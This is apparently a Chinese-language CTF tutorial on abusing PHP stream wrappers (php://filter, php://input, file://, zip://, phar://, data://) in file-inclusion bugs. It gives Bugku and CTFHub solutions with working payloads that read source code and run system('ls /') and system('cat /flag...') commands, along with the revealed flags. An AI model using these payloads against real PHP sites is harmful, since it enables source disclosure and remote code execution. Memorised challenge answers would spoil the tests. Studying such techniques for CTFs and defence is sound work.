文章目录
下面就来了解一下php伪协议
php提供了一些杂项输入/输出流,允许访问php的输入输出流、标准输入输出和错误描述符,内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器
php://filter
打开链接后发现只有一个click me?no
发现
php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。
简单来理解就是:php://filter是可以作为一个中间流来处理其他流,可以进行任意文件的读取。而且当使用不同的参数可以达到不同的目的和效果:
下面实践一道bugku上的题:
点了之后发现?file=show.php
,涉及文件包含漏洞
此外我们还发现了index.php,那么我们可以用php://filter
中的read
参数查看源文件内容
?file=php://filter/read=convert.base64-encode/resource=index.php
这里之所以进行base64编码是为了php不对其进行解析
解码可以得到源代码以及flag:
<html>
<title>Bugku-web</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:flag{a7fc5a7b4666b8f3273d9c29a1b0f206}
?>
</html>
php://input
php://input 是个可以访问请求的原始数据的只读流,可以读取没有处理过的POST数据。
php://input + [POST DATA]执行php代码
ctfhub 上的一道php://input
代码的意思是截取字符串的前六个字符必须要与php://相等,也就是file变量的值的前六个字符需要与php://相等;
使用php伪协议
点击phpinfo查看信息
构造payload:
?file=php://input
通过post传参 <?php system('ls /')?>
我们可以看到flag_10673,使用cat
查看flag的值:
<?php system('cat /flag_10673');?>
ctfhub{4f7f0d8544a283544958ab9b}
注意:
1、<?php print_r(scandir('路径'))?>
PHP的scandir()函数会将当先目录下的目录结构以数组的方式保存
2、<?php system('ls /')?> 显示整个根目录下的文件
file://
用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。
include()/require()/include_once()/require_once()参数可控的情况下,如导入为非.php文件,则仍按照php语法进行解析,这是include()函数所决定的。
用法:
file://[文件的绝对路径和文件名]
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
[文件的相对路径和文件名]
http://127.0.0.1/include.php?file=./phpinfo.txt
[http://网络路径和文件名]
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
在本地搭建靶场:
http://127.0.0.1/1.php?file=file://C:/phpStudy/PHPTutorial/WWW/1.txt
访问成功!
也可以练习php://filter协议
http://127.0.0.1/1.php?file=php://filter/read/convert.base64-encode/resource=1.txt
zip:// & bzip2:// & zlib:// 协议
zip:// & bzip2:// & zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀:jpg png gif xxx 等等。
1.zip://[压缩文件绝对路径]%23[压缩文件内的子文件名](#编码为%23)
压缩 phpinfo.txt 为 phpinfo.zip ,压缩包重命名为 phpinfo.jpg ,并上传
http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt
2.compress.bzip2://file.bz2
压缩 phpinfo.txt 为 phpinfo.bz2 并上传(同样支持任意后缀名)
http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2
phar:// 协议
phar://协议与zip://类似,同样可以访问zip格式压缩包内容
data:// 协议
自PHP>=5.2.0起,可以使用data://数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。
data: text/plain,<?php 执行内容 ?>
data://text/plain,
data://text/plain;base64,
http:// & https:// 协议
常规 URL 形式,允许通过 HTTP 1.0 的 GET方法,以只读访问文件或资源。